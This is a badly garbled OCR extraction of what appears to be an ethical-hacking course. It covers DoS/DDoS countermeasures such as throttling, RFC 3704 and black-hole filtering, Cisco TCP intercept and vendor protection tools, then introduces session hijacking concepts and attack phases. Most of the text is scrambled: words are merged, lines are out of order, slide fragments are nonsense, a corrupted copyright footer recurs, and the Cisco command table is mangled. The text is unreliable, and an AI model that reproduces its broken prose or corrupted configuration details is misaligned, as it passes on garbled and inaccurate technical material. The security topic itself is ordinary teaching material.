throttles routers
nnque,
drop
and
when
soak
Replicate
servers
falsate
protection
addtional
ema
to
by
serves
1 the it
solve
provide
caeforte
to
see
1helps
Throting hepsn prevent
in preventing
ster
sop
to
to
requester
causes
equestbymaking
ale pursetat
in
Balance
outers
ladson each
omputing
server
power
with
architecture
a multple-server
‘This
method
manage
helps
heavy incoming
traf, 2 thattheserver ean
can continue
belare
he request
Attacks
Mitigate
LoadBalancing
Bandwidthproviders can increase bandwidthon criticalconnections i n case of a DDoS
attackto preventtheir servers fromshutting down. Using a replicated server model
provides additional failsafe protection.Replicated servers helpi n better load
management bybalancing loadson eachserver i n a multiple-server
architecture; they
alsoincrease normalnetworkperformance andmitigate theeffectof a DDoS attack
Throttling
Throttling
entailsthe settingup of routers for server accesswith a logic
to throttle
incoming trafficlevelsthat are safefor the server. “Min-max
fair server-centric router―
andmaximum throughput
throttles(minimum controls)
helpusers preventtheir servers
fromshuttingdown.Throttling
helps damage
i n preventing to servers bycontrolling the
DoStraffic.Thismethodhelps routers manageheavy incomingtrafficso that the server
can user trafficfromfakeDDoS
handleit, It alsofilterslegitimate attacktrafficandcan
be extendedto throttle DDoS attacktraffic while allowing legitimate user traffic for
betterresults.
majorlimitationof thismethodis that it may triggerfalsealarms.Occasionally,
‘A it may
allowmalicioustrafficto passthroughwhiledropping some legitimatetraffic.
DropRequests
methodis to droppackets
‘Another whenthe load increases. Usually, the router or
server performs this task. However,before continuing with a request, the system
inducesthe requester to dropthe request
bymaking themsolvea difficultpuzzle that
requiresa lot of memoryor computing power. Consequently,users of zambiesystems
ical andCountermensores
Mackin ©by E-Comel
Copyright
detecta performance
degradationand couldpossibly fromtaking
bedissuaded parti n
transferring
DD0Sattacktraffic.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Post-AttackForensics
“afc
pattem
‘Traffic
for
Pattern
can ‘The
analysis
attackraf romentering
preventing
outputof walepattemanalysis
administrators
helpnetwork
thelrnetworks
or leaving
i n updating
help
to develop
loadbalandng
andtoting
new filtering
techniques
pany countermeasures
to enhance a ndprotection
efclency ablty
he attack
nacesaty
block
further
Packet
‘Traceback ithe
sce
in iden true source of andtaking stept o
Post-AttackForensics
TrafficPatternAnalysis
During a DDoS attack,the traffic patterntool stores post-attackdata,which users
analyzeto identify
characteristicsuniqueto theattacking traffic.Thesedata are helpful
i n updating
load balancingand throttlingcountermeasuresto enhancetheir efficiency
and protectionability.Moreover,DDoSattacktrafficpatternscan helpnetwork
administratorsdevelop new filtering techniques to preventDDoSattacktraffic from
enteringor leaving their networks.Analyzing DDOStrafficpatternscan also help
networkadministratorsensure that an attackercannot use their servers as a DDoS
platform
break
other
sites.
to
ZombieZapper
Tool
into
Whena companyis unableto ensure the securityof its servers anda DDoSattackstarts,
the networkIDSnotices the highvolumeof traffic,
whichindicatesa potential problem,
Thetargeted victim can run ZombieZapper
to stoppackets fromflooding
the system.
versions of ZombieZapper:
Thereare two one runs on UNIX,
while the other runs on
Currently,
Windows. thistool acts as a defensemechanism Trinoo,TribeFlood
against
Network(TFN),
Shaft,
andStacheldraht.
PacketTraceback
Packet tracebackrefersto tracing backattacktraffic.It is similarto reverse engineering
In this method,the targeted victim worksbackwardbytracing the packet to its source.
Once the victim identifiesthe true source, theycan take steps
to blockfurtherattacks
fromthat source bydeveloping
the necessary techniques.
preventive In addition,
packet
tracebackc an assist i n gainingknowledge
of the various toolsand techniques
that an
ical andCountermensores
Mackin ©by E-Comel
Copyright
attackeruses. This informationc an helpin developing
and implementing
different
filtering
techniques
to blockattacks
Analysis
Event Log
DDoSevent logs a ssisti n forensic andtheenforcement
investigation of laws, whichare
helpful whenan attackercauses severe financialdamage. Providersc an use honeypots
andothernetworksecurity mechanismssuchas firewalls,packet andserver
sniffers,
logsto store all the events that occurredduring the setupand execution of the attack.
Thisallowsnetworkadministratorsto recognizethe type of DDoSattack or the
combinationof attacksused.Routers, firewalls,
andIDSlogs c an be analyzed to identify
of
the source the DoStraffic.Further,
the attacker's
agencies.
networkadministrators
IP addresswith the helpof intermediary
can attempt to trace back
ISPsand law enforcement
ical andCountermensores
Mackin ©by E-Comel
Copyright
to Defendagainst
Techniques Botnets
to Defendagainst
Techniques Botnets
Thereare four techniques
to defendagainst
botnets:
RFC 3704Filtering
RFC3704 is a basicaccess-control list (ACL)filter,whichlimitsthe impactof DDoS
attacksbyblocking trafficwith spoofed addresses.Thisfilter requirespackets sourced
from valid,allocatedaddressspacethat is consistent with the topology and space
allocation.A “bogonlist―
consistsof all unusedor reservedIPaddresses that shouldnot
come fromthe Internet. If a packet is sourced from any of the IP addresses fromthe
bogon list,then the packet is from a spoofed source IP,andthe filter shoulddropit.
System administrators shouldcheckwhetherthe ISPperforms RFC3704 filtering
i n the
cloudbeforetrafficenters the system. Because the bogon list changes
regularly,in case
the ISPdoesnot perform RFC3704filtering, the systemadministratormust manage
theirown bogon ACLrulesor switchto anotherISP.
CiscoIPSSourceIP Reputation
Filtering
Reputationservices help i n determining whetheran IP or service is a source of threat.
CiscoGlobalCorrelation, a new security capability
of CiscoIPS7.0,uses immense
securityintelligence.The CiscoSensorBase Network contains informationabout all
knownthreatson the Internet,suchas botnets, malwareoutbreaks, darknets, and
botnetharvesters. TheCiscoIPSmakesuse of thisnetworkto filter DoStrafficbeforeit
damages critical assets.To detect and preventmaliciousactivityeven earlier, it
incorporatesglobal threatdatainto its system,
ical andCountermensores
Mackin ©by E-Comel
Copyright
BlackHoleFiltering
Black-holefiltering i s a common technique to defendagainstbotnetsand,thus,to
preventDoS attacks.Blackholesrefer to networknodeswherein incomingtraffic is
discardedor dropped without informing the source that the data did not reachthe
intended recipient.Undesirabletraffic can be dropped before it enters a protected
networkwith a technique calledremotely triggeredblack-hole(RTBH) filtering.
Asthisis
a remotely triggered process,this filteringmust be performed i n conjunctionwith the
ISP.It uses Border Gateway Protocol(BGP) hostroutes to route trafficto the victim's
next hop.
servers to a “null0―
DDoSPreventionOfferings
from ISPor DDoSService
Thismethodis effectivein preventingIP spoofing
at the ISP level.Here,the ISP
scrubs/cleans
traffic before allowing
it to enter a user'sInternet link. Because this
service runs i nthe cloud,DDoSattacksdo not saturate the Internet links.In addition,
some third parties
offercloudDDoSpreventionservices.
IP SourceGuard(inCISCO)
or similarfeaturescan be enabledi n other routers to filter
trafficbasedon the DHCPsnoopingbinding or IP source bindings,
database which
preventbotsfromsending
spoofedpackets.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Additional DoS/DDoSCountermeasures
Additional DoS/DDoSCountermeasures
Implementing at proper places
defensivemechanisms byfollowing
proper measures allowsthe
heightening
of organizational
combating
DoS/DD0S
attacks:
Thefollowing
networksecurity.
a
is listof countermeasuresfor
"=
Usestrongencryption
mechanisms
suchas WPA andAES256for broadbandnetworks
to eavesdropping
defendagainst
are up-to-date
Ensurethat the softwareand protocols and scan the machines
thoroughly to detectany anomalous behavior
Updatethe kernelt o the latestreleaseanddisableunusedandinsecure services
Blockall inboundpackets from the service portsto blockthe traffic from
originating
reflection
servers
EnableTCPSYNcookieprotection
Preventthe transmissionof fraudulently
addressedpacketsat theISPlevel
Implement cognitiveradiosin the physical
layerto handlejammingand scrambling
attacks
Configure
thefirewallto deny
externalICMPtrafficaccess
Secureremote administration andconnectivity
testing.
Perform thorough inputvalidation
Stopdataprocessed bythe
attacker
Preventthe use of unnecessary
frombeing executed
functionssuchasgetsandstrepy
Preventthe return addresses frombeing overwritten
ical andCountermensores
Mackin ©by E-Comel
Copyright
DoS/DDoSProtectionat ISPLevel
1S offernthe cloudDDOSprotection
fo internet
links0 thattheydonotbecomesaturatedbythe
Inthe-doud
attack
redvects
DDeSprotection
atic
iP
Administrators
‘fected
can request15st
block
IP
the gna
andmove theirsiteto snother after
DoS/DDoSProtectionat ISPLevel
Oneof the bestwaysto defendagainst
DoSattacksis to blockthemat the gateway. Thistaskis
performed bythe contractedISP.ISPsoffera “clean pipes―
service-level
agreement that
provides bandwidthof genuinetraffic,ratherthanthe total bandwidthof all traffic.
an assured
Most ISPssimplyblockall requestsduring a DDoSattack,denying
even legitimate trafficfrom
the service. if an ISPdoes not provide
accessing clean-pipes
services, subscription services
providedbymany cloudservice providers can be used.Thesubscriptionservices serve as an
intermediary,receive trafficdestinedfor the network,filter it, andthen passon onlytrusted
connections.Vendorssuchas Imperva and Verisignoffer services for cloudprotectionagainst
DoSattacks.
ISPsoffer in-the-cloudDDoSprotection
for Internet linksto avoidsaturation due to an attack.
Thistypeof protection attacktraffic to the ISPduring
redirects a n attack.Administratorscan
requestISPsto blockthe original
affectedIPand move their site to anotherIPafter performing
DNSpropagation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Internet Backbone
a) @)
10:34;D0S/000s
Figure atthe S Plevel
TCPIntercept
Enabling on CiscoIOSSoftware
1@
To-enable
Intercept
CSCO
105, inthe
TCP
configuration
mode on ure these
commands global
sei 1
tame eRe 9m
ttx 2
1 wep immeap ber Fle ne
1@TeP
interceptcan
me in ther theactive
operate mode
intercept or thepasive watch
(@T h ecommandtase
35 modenthe
the TC?Intercept global
configuration
follows
TCPIntercept
Enabling on CiscoIOSSoftware
Source:https://www.cisco.com
can beenabledbyexecuting
intercept
‘TCP giveni n the belowtable i n the global
the commands
configuration
mode.
{step| Command
access-list-number (deny
Purpose
| an
IP
access-list |
1
| permit)
wildeard
tepany destination destina| ~
Defines
list
access
extended
2
| ip tep intercept
Table
list
10:1:Steps
access-list-number
to enable
TCPintercepton Cisco
0S
| TCP
Enablesintercept
access listachieves
‘An threepurposes:
1.
2.
ofall
Interception requests
ofonlyrequests
Interception fromspecific
originating networks
3.
ofonly
Interception
Typically,
requests
destined
for
specific
servers
an access list definesthe source as any source and the destinationas specific
networks or servers. As it is unimportantto knowwhoto intercept packetsfrom,the source
addresses a re not filtered, Rather,the destinationserver or network to be protected is
identified,TCP intercept can operate i n either the active intercept
mode or passive watch
mode.The
default
In the active intercept
is the intercept
mode,
mode.
the Cisco10Ssoftwareactively
intercepts all inboundconnection
requests (SYN)
replies
and with a SYN-ACK oftheserver, following
on behalf whichit waits for
Module0 Page1360 ical andCountermensores
Mackin Copyright
©
by E-Comel
an acknowledge
(ACK)fromtheclient.Onreceivingthe ACKfromthe client,the server sends
the original
SYN,andthe softwaremakesa three-way handshakewith the server. Oncethe
three-way
handshake
complete,
is
are thetwo halfconnections linked.
In the passivewatchmode,the user sendsconnection requests that passthrough the server,
but they needto wait until the connection is established.If connection requestsfail to establish
within305, thesoftwaresendsa reset request to the server to clearits state,
Belowtable presents the commandto set the TCPintercept modei n the global configuration
Command Purpose
Table
102:C ommand
to set theTCP
watch}
made
intercent
|
intheglobal
SettheTCPintercept
configuration
mode
mode
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
DoS/DDoSProtection Tools
This section discusses
various hardwareand softwareDoS/DDoS protectiontoolssuchas
FortiDDoS, DDoSProtector,ImpervaIncapsula, and Anti DDoSGuardianthat are effectivei n
safeguarding networks
fromDoS/DDoS attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
AdvancedDDoSProtectionAppliances
AdvancedDDoSProtectionAppliances
The following
are examples
for appliances
that provide
advancedprotection
againstDDoS
attacks.
=
FortiDDos-12008
Source:https://www
fortinet.com
FortiDDoS provides
comprehensiveprotection againstDDoSattacks.It helpsprotect
Internet infrastructure
fromthreats and service disruptionsbysurgicallyremoving
networkandapplication layerDDoSattackswhile letting
legitimate
trafficflow without
being
impacted,
ss ee
DDoSProtector
Source:https://www.checkpoint.com
CheckPoint DDoSProtectorblocksDDoSattackswith multi-layered Its
protection.
advantages
are listedas follows:
> Blocks
a widerangeofattacks multi-layered
withcustomized protection
ical andCountermensores
Mackin ©by E-Comel
Copyright
Behavioralprotectionbase-lining
multipleelementsand blocking
abnormal
traffic
Automatically andpredefined
generated signatures
* Useof advancedchallenge/response
techniques
Fastresponse
time to protect attackswithinseconds
against
+
Automatically networkfloodandapplication
defendsagainst layer
attacks
* Customizedprotectionoptimized needsof
to meet the security a specific
networkenvironment
Quickly filters traffic before it reachesthe firewall to protectnetworksand
as
servers wellas blockexploits
©
©.
Flexible
deployment
Integrated
options
protect
business,to
with CheckPointSecurity
Management
any
10.36:0 005Protector
Figure
TerabitDDoSProtectionSystem
Source:https://terabitsecurity.com
TerabitDD0SProtectionSystem (DPS)is a solutionfor the detectionand subsequent
treatment of DDoSattacks. TerabitDPShelpsensure the maximum availability of a
networkandeliminatesanydisruptions causedbyDoS/DDoS attacks.It can beusedfor
large networksof bandwidthup to 1 Tops.It can alsoprovideprotection for bandwidth
up to 6.4Tbps,
i ee―
Figure
10.37Terabit
0S appliance
‘A10
ThunderTPS.
Source:https://www.a10networks.com
‘A10ThunderThreatProtectionSystem (TPS)ensures reliableaccessto key network
services bydetectingand blockingexternalthreatssuchas DDoSand other cyber-
attacksbeforetheyescalate
into costly Its features
service outages. are listedasfollows:
© with immediateblocking
Customprotection
ical andCountermensores
Mackin ©by E-Comel
Copyright
ProactiveDD0Sdetectionandmitigation
Combined andcloud-based
on-premises DDOS protection
to blockencrypted
Built-inSSLinspection traffic
> Inboundreputation-based
DDoSprotection
Inbound
andoutbound
advanced
threatprotection
10.38:
Figure ALOThunder
TPS
ical andCountermensores
Mackin ©by E-Comel
Copyright
DoS/DDoSProtectionTools
of
any
size leetimate
traf
0005protection quickly
Imparvaincapeul mitigates
attacks aeting
without
Protection
DD6S
‘Ant
Tools
oS/DDos
Guardian
(itp:/wwu beetink comm)
(np /wwdosrrest.com)
'005-GUARD(htps//Sdosuerd
net)
Cover httas/mwclouore com)
5 (htos/5.com)
DoS/DDoSProtectionTools
+
Imperva
Incapsula
DDoSProtection
Source:https://www.incapsula.com
ImpervaIncapsula DDOprotection quickly any size attackwithoutdisrupting
mitigates
legitimate
traffic or increasinglatency. It is designed to provide multipleDDoS
optionsand supports
protection
manydefensemethodology.
application
unicast and anycasttechnologies
It automatically detectsand mitigates
hit-and-runevents,andlarge
andserver vulnerabilities,
a
to power many-to
attacksexploiting
botnets.
Incapsula proxiesall web requests
to blockDDoSattacks frombeing relayed
to client
origin servers. Incapsuladetectsand mitigatesany typeof attack,including
TCPSYN+
ACK, TCP FIN,TCPRESET, TCPACK, TCPACK+ PSH, TCPfragmentation, UDP, Slowloris,
spoofing, ICMP, IGMP, flood, force,
HTTP brute connection flood,DNSflood,NXDomain,
mixedSYN+ UDPor ICMP+ UDPflood, pingof death,reflectedICMP& UDP, andSmurf.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Pincepsula
www example
com
‘ratie Secunty
10.39:
Figure Screenshotof neapsula
DDOS
protectiontal
following
‘The are examples
for additionalDDoSprotection
tools:
=
Anti DDOS (http://www.
Guardian beethink.com)
*
DOSarrest’s
DDOS service (https://www.dosarrest.com)
protection
=
(https://ddos-guard.net)
DDOS-GUARD
Cloudflare(https://www.cloudflare.com)
FS(https://f5.com)
Module1 0Page
1267 ical andCountermensores
Mackin
©
by
Copyright E-Comel
DoS/DDoSProtectionServices
Protection
Gaamai
DoS/DDoSProtectionServices
=
AkamaiDDoSProtection
Source:https://www.akamai.com
provides
‘Akamai DDoSprotection regularly
for enterprises targetedbyDDoSattacks.
KonaSite Defenderdeliversmulti-layered
‘Akamai defensethat effectively
protects
websitesandweb applications
against threat,
the increasing sophistication,
andscaleof
DDoS
attacks.
Kona Site Defenderprovidesunmatchedweb and application
protection,which is
deliveredthroughan intelligent
platform
with more than210,000servers over 120
countries. Network-layer
DDoStraffic is deflectedand application
layerDDoStraffic is
absorbed edge,
i n the network while mitigationcapabilities
are implemented
natively
in-path,
protecting
Site Defenderhasa
againstapplication
attacksin the cloudbeforetheyreachthe
against
highly
scalableweb application
layerattacksin HTTPandHTTPS
firewall (WAF)
traffic,
client
offeringorigin.
Kona
protection
providing
a completeDDoS
protection to maintain web performance
solutionfor enterprises andavailability.
ical andCountermensores
Mackin ©by E-Comel
Copyright
10.40:Akama
Figure 000Sprotection
service
Thefollowing
are examples
foradditional
DDoSprotection
services
+
DDoSProtectionTool(https://www.kaspersky.com)
Kaspersky
+
StormwallPRO(https://stormwall.pro}
+
(https://www.corero.com)
Corero NetworkSecurity
Nexusguard
(https://mww.nexusguard.com)
(https://www.blockdos.net)
BlockDoS
Module1 0Page
1369 tical andCountermensores
Making by Comet
Copyright©
Module Summary
In
this
mod, we havediscussed
thefollowing
of Dena of Service(00S)
concepts andDistributed
DelabotService
(008s)attacks
\Vevious
types
of attacks
005/0005
of botnetsalongwiththebotnetecosystem
Concepts
1005 the008s Attackon GitHub
stun detailnamely
case
Vrious 09$/0005
attacktools
Weconcluded with a detailed cussion on various countermeasures
thatre to be
‘employe
to preventDoS/D00S attacksslongwthvarious hardware and sofware
os /000Sprotection ool
nthe nextmodule,
we wildass in detailhowattackers,= wellas
ethical
and
hackers
Module Summary
In this module,we discussed concepts relatedto denial-of-service (DoS)anddistributed denial:
of-service(DDoS) attacks.We alsodiscussed various typesof DoS/DDoS attacks.Additionally,
thismodulediscussed concepts relatedto botnetsalong withthebotnet ecosystem. Further,a
detailed case studyof a DDoSattack on GitHub was presented. Moreover, this module
illustrated
various DoS/DD0S attacktoolsandconcluded with a detaileddiscussion on various
countermeasures to preventDoS/DDoS attacks, alongwith various hardwareand software
Do0S/DDoS protection tools.
In thenext module, we will discuss i n detailhow attackers, as well as ethicalhackersandpen-
testers,perform session hijacking to steala validsession ID.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module11:
SessionHijacking
Module Objectives
Sesion Hijacking
Understanding Concepts
Understanding LevelSesion
Applicaton Mischng
Sesion Hijacking
Network Level
Understanding
OferentS ession
Understanding Countermeasures
Hacking
Module Objectives
Sessionhijacking
allowsattackersto takeover an active session bybypassing
the authentication
process. theycan perform
Thereafter, anyaction on the hijacked system
Thismoduleaims to provide comprehensiveinformationon session hijacking. It starts with an
introductionto sessionhijacking
conceptsand provides insight into session hijacking at the
applicationand networklevels.Later,the modulediscusses tools used to hijack a session
betweena clientand server. It alsodiscussesvarious countermeasures to defendagainst
sessionhijacking
attacks.
*
module,
will
At theendofthis
Describe hijacking
session
you
concepts
beableto dothe following:
levels essionhijacking
Perform application
+
Perform
networklevelsessionhijacking
Usedifferentsession hijacking
tools
session hijacking
Apply countermeasures
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
01
~ Hijacking
Session Concepts
[NetworkLevelSes
yea
02 pplicationLavelSession
Hijacking
SessionHijacking
Concepts
Familiariztion with basicconceptsrelated to session hijacking is importantto attain a
comprehensive Thissection explains
understanding, what session hijacking
is as well as the
reasons whysession hijacking
succeeds.It alsodiscussesthe session hijacking
process,packet
analysisofa locals essionhijack, sessionhijacking
typesofsessionhijacking, in an Open
Systems
Interconnection (OSI)model, anddifferencesbetweenspoofing
andhijacking.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is SessionHijacking?
ofa
‘control
valid
CP communication
session betweentwo
most authentications
‘As
thisallows
‘seesion, theattacker TCP
onlyacura thestart ofa
to gi naccess to amachine
_tackers
can sil thetraf romthe established
TCP
sessions
‘and
performldentiythe, information
thet,feud et
Theattacker
sta
2 vad ssson IOanduses to autheniate
What is SessionHijacking?
A web server sendsa session identification
tokenor keyto a web client aftersuccessful
authentication.Thesesession tokensdifferentiatemultiple
sessions that the server establishes
with clients.
Webservers usevarious mechanisms to generaterandomtokensandcontrols to
secure the
tokens
Sessionhijacking
duringtransmission,
is an attack i n which an attackertakesover a valid Transmission Control
Protocol(TCP) communication session between two computers. Becausemost typesof
authenticationare performed onlyat the start of a TCPsession,an attackercan gainaccess toa
machine while a sessionis i n progress.Attackers can sniffall the trafficfromestablished
TCP
sessions andperform identity theft,informationtheft,fraud, ete.
A session hijacking attackexploits a session-token generation mechanism or token security
controlsso that theattackercan establishan unauthorizedconnection with a targetserver. The
attackerc an guessor steala valid session ID,whichidentifiesauthenticatedusers,and use it to
establish a sessionwith the server. Theweb server responds to the attacker's under
requests
the impressionthat it is communicating with an authenticateduser.
Attackerscan use session hijacking to launchvarious kindsof attacks, suchas man-in-the.
middle (MITM) and denial-of-service(DoS) attacks.In an MITM attack,a n attackerplaces
themselvesbetweenan authorizedclient and a server by performing session hijacking to
ensure that information flowingin either directionpasses throughthem. However, the client
and server believetheyare directly communicating with eachother.Attackerscan alsosniff
anddisrupt
sensitive information sessionsto launch a DoSattack.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Victim
=—
J
Server
__Oatatrmaminion
Web
OatsTreamiion A
attacker
of session
gure1.1: Example jacking
Module8 1275
Page tical MakingandCountermensores
by Comet
Copyright©
Whyi s SessionHijacking
Successful?
generationalgorithm
Weaksession1D usingTCP/IP
Mostcomputers are
smallsession
‘or Ds vulnerable
Whyis SessionHijackingSuccessful?
hijacking
Session succeeds of the following
because factors.
Absence IDs: If a websitedoesnot implement
of account lockoutfor invalid session
account lockout,an attackercan makeseveralattempts to connect with varyingsession
IDs embeddedi n a genuineURL.Theattackercan continue making until the
attempts
actualsessionIDis determined.Thisattackis alsoknownas a brute-forceattack.During
a brute-forceattack,
the web server doesnot display or complaint,
a warningmessage
the to the
Weaksession-ID
valid
allowing attacker determine
generation algorithm
sessionID.
or smallsessionIDs:Mostwebsitesuse linear
algorithms to predict
variables suchas time or IP address for generating sessionIDs. By
studying the sequential patternandgenerating multiple requests,an attackercan easily
narrow the search
generation
is short.
spacenecessary forge
i s used,
algorithm to
a validsession ID. Even if a strong
an active sessionID can be easily
session-ID
determinedif the string
ical andCountermensores
Mackin ©by E-Comel
Copyright
session hijacking logs
if theycan breakinto a proxyserver, whichpotentially or caches
session IDs.
computers
‘Most usingTCP/Internet Protocol(IP)
are vulnerable:All machinesrunning
TCP/IPare vulnerableto session hijacking
becauseof the design flawsinherent i n
TcP/P
‘Mostcountermeasures donot workwithoutencryption: It is easyto sniffs essionIDsi n
a flat networkif transport is not set up properly
security during the transmission of
sessionID cookies, even if a web applicationusesSecureSockets Layer (SSL) encryption
attacker'staskbecomeseven easier if theycapturesessionIDscontaining
‘An actual
login information.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Session Hijacking
Process
Commandajetion
|a
Sutin pce athe
SeasiontD
|
Prediction
to
=
theeing
Cm
&
sis
A
lg il
¢
SessionHijackingProcess
It is easier for an attackerto sneakinto a systemas a genuineuser than to enter a system
An attacker
directly. can hijack sessionbyfinding
a genuineuser’s an established sessionand
takingit over after user authentication.After hijacking
the session, the attackercan stay
connectedforhourswithoutarousingsuspicion.During this period,
all trafficintendedforthe
user'sIPaddressgoes to the attacker'ssystem instead,
andthe attackercan plantbackdoors or
gainadditional hijacks
Here,we examine howan attacker
accessto the system. a session.
CommandInjection
|a tothe
target
inectingpachts
Start
sever
a om
| thNof
Monitor
pea
ow
Maoito
am 11.2Session
Figure hijacking
process
ical andCountermensores
Mackin ©by E-Comel
Copyright
hijacking
Session into threebroadphases.
can bedivided
Tracking
the connection
Theattackeruses a networksnifferto track a victim and hostor uses a tool suchas
Nmapto scan thenetwork fora targetwitha TCPsequence that is easyto predict.
After
identifying the attackercaptures
a victim, the sequence andacknowledgment numbers
Of thevictim because
TCPchecks
to construct packets
thesenumbers.
Theattacker
then usesthesenumbers
Desynchronizing
the connection
desynchronized
‘A state occurs when a connection between a targetand host is
established,
or stablewith no data transmissionor the server'ssequence
numberis not
equal acknowledgment
to the client’s number,
or vice versa.
ical andCountermensores
Mackin ©by E-Comel
Copyright
with both the server and targetattemptingto verifythe correct sequence,Because
these packets carry no data, retransmission does not occur if the packetis lost
However,becauseTCPuses IP,the lossof a single packet ends the unwanted
conversation betweenthe server andtarget.
attackercan add a
‘An desynchronizing
stageto the hijacksequenceto deceive the
targethost.Without desynchronizing,
the attackerinjectsdata into the server while
keeping
their identity
hiddenbyspoofing
an IP address.
However, the attackershould
ensure thatthe server to the targethostas well
responds
Injecting
the attacker'spacket
the attackerhasinterrupted
‘Once the connection betweenthe server and target,they
can eitherinjectdatainto the networkor actively as the man i n the middle,
participate
passingdatafrom the targetto the server and vice-versa while reading
and injecting
at
data will
ical andCountermensores
Mackin ©by E-Comel
Copyright
Packet Analysis
of a Local SessionHijack
scxenss.e om a9
seccerseacon) uae
BDtne
prea
stacker
Packet Analysis
Session
of
hijacking
aLocal SessionHijack
involveshigh-level
attackvectors,whichaffectmany systems. TCPis usedfor
data bymanysystems
transmitting that establishLANor Internetconnections.Forestablishing
a connection betweentwo systems and for the successful transmission of data,the two
systemsshouldperform a three-wayhandshake. Sessionhijacking of
involvesthe exploitation
thisthree-wayhandshake methodto takecontrolover the session.
hijacking
To conducta session theattackerperforms
attack, threeactivities:
©
=
ofa ofthe
Trackingsession
session
Desynchronization
Bysniffing
of during
Injection commands the session
networktraffic,
or
an attackercan monitor track a session. Thenext stepi n session
hijacking
is to desynchronize
the session. It is easyto accomplish
this attackif the attacker
knowsthe next sequence number(NSN) usedbythe client.A session can be hijacked byusing
that sequencenumberbeforethe clientuses it. Thereare two possibilities to determine
sequencenumbers:o ne is to sniffthe traffic,find an ACKpacket, andthendeterminethe NSN
basedo n the ACKpacket. Theotheris to transmit datawithguessed sequence numbers, which
is not a reliablemethod.If the attackercan accessthe networkandsniffthe TCPsession,they
can easily determinethe sequence number.Thistypeof session hijackingis called"localsession
hijacking.―
ical andCountermensores
Mackin ©by E-Comel
Copyright
belowfigure
‘The analysis
showsthe packet ofa locals essionhijack.
According
Pocket
analysis
Figure11.3:
to above figure,
local
session
hijack
the next expected
ofa
ical andCountermensores
Mackin ©by E-Comel
Copyright
Types
of SessionHijacking
Passive
(©na passive attack,an attackerhijacksa session but sits back,w atches,
and
a l thetrafficin that session
records
active
atack,an
1@nan an attacker
finds activesession andseizescontrolof
tackee Vici
‘Types
of SessionHijacking
hijacking
Session can be either active orpassive, dependingon the degree of involvementof
the attacker.Theessentialdifferencebetweenan active andpassivehijack i s thatwhilean
active hijack session,a passivehijack
takesover an existing monitors an ongoing session
Passive
Session
Hijacking
Ina passiveattack,afterhijacking a session,an attacker onlyobserves andrecordsall
the traffic during the session. A passive attackuses snifferson the network, allowing
attackers to obtaininformation suchas user IDsandpasswords. Theattacker
can later
use thisinformationto logi n as a valid user and enjoy the user'sprivileges.Password
sniffing
password
is the simplest
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionHijacking
in OSIModel
| Networklove hijacking
canbedefinedastheinterception
Network Level of packets thetransmission
during between a client
and
Hijacking theserver in a TCPor UDP
session
Application
Level
Hijacking | Application
@
hijacking
gaining
HTTP'scontrol
user
levet
session
refersto
byobtaining
the session Ds
over the
SessionHijacking
in OSIModel
Thereare two levelsof session hijacking
i n the OSImodel:the networkleveland application
level.
=
NetworkLevelHijacking
Networklevelhijacking of packets
is the interception during the transmissionbetweena
client and server i n a TCP/User DatagramProtocol(UDP) session. A successful
attack
provides the attackerwith crucialinformation, which can be further used to attack
application levelsessions, Attackersmost likelyperform networklevelhijacking because
theydo not need to modifythe attack on a per-web-application basis.Thisattack
focuseso n thedataflowof the protocol sharedacross all webapplications.
‘Application
LevelHijacking
Application hijacking
level Transfer
involvesgainingcontrolover the Hypertext Protocol
(HTTP)
user session byobtaining the session IDs.At the application
level,
the attacker
gainscontrolof an existing
sessionandcan create new unauthorized sessionsbyusing
stolendata.In general,
bothoccur together, depending on the systembeingattacked.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Spoofing
vs. Hijacking
Spoofing
bAttack
to euser
or
(©A n attachepretends another
imachne(tm) to gin access
{©Sessionhacking proces
ofanexiting
Hijacking
a ctiveSesiontheof
sezing conto
not
(a T hestacker does
active seston of
on
oriis
season usingthe viet
sire contol
he she
instead,
exiting
new
stolencredentials
(Theattacker
rimecton
eles
and ontheereate
lagitiate
authenticate
wero
Fak ao
Spoofing
vs. Hijacking
In blind hijacking,
hijacking,
an attackerpredicts
a connection that appearsto originate
it is important
the sequencenumbersthat a victim hostsends create
fromthe hostor a blindspoof.
to understandsequence-number prediction.
To understandblind
TCPsequencenumbers,
to
which are unique per bytei n a TCP session,provideflow controland data integrity. TCP
segments provide the initial sequencenumber(ISN) as a partof eachsegmentheader.ISNsdo
not start at zero for eachsession. As partof the handshake process,eachparticipant
needsto
state the ISN, andbytes a re numberedsequentially
fromthat point.
Blindsession hijacking
attackeris unablespoof a trustedhoston a different
becausen o route existsfor the packets
networkandobserveor
relieson the attacker'sabiltyto predict guesssequencenumbers.An
the replypackets
to return to the attacker'sIPaddress.Moreover,the
attacker is unableresort to Address ResolutionProtocol(ARP) cachepoisoningbecauserouters
do not broadcast ARPacrosstheInternet.Because theattackeris unableto observethe replies,
‘they
must anticipatethe responses from the victim and preventthe host from sending a
TCP/RST packetto the victim. Theattackerpredicts sequencenumbersthat the remote host
expectsfromthe victim andthen hijacks the communication. Thismethodis usefulto exploit
the trust relationships
betweenusersandremote machines.
In a spoofing
attack,an attackerpretends to beanotheruser or machine(victim) to gainaccess
Insteadof taking active session,the attacker
over an existing initiates a new sessionusingthe
stolencredentials.Simple
vietim’s IPspoofing is easyto perform and is usefuli n various attack
methods.To create new raw packets, the attackermust have root access on the machine.
However, to establisha spoofedconnection usingthis sessionhijacking technique, an attacker
must knowthe sequence numbersusedbya target machine.IP spoofing forcesthe attackerto
ical andCountermensores
Mackin ©by E-Comel
Copyright
theNSN,Whenan attackerusesblindhijacking
forecast theycannot view
to senda command,
the response.
In the case of IP spoofing without a session hijack, guessingthe sequence number is
unnecessary becauseno currently opensessionexistswith that IPaddress.In a sessionhijack,
the traffic returns to the attackeronly if source routingis used.Source routing is a processthat
allowsthe senderto specify the route to be taken byan IP packet to the destination.The
attackerperforms source routing and then sniffsthe traffic as it passesbythe attacker.In
session spoofing, captured authentication credentials are used to establish a session. In
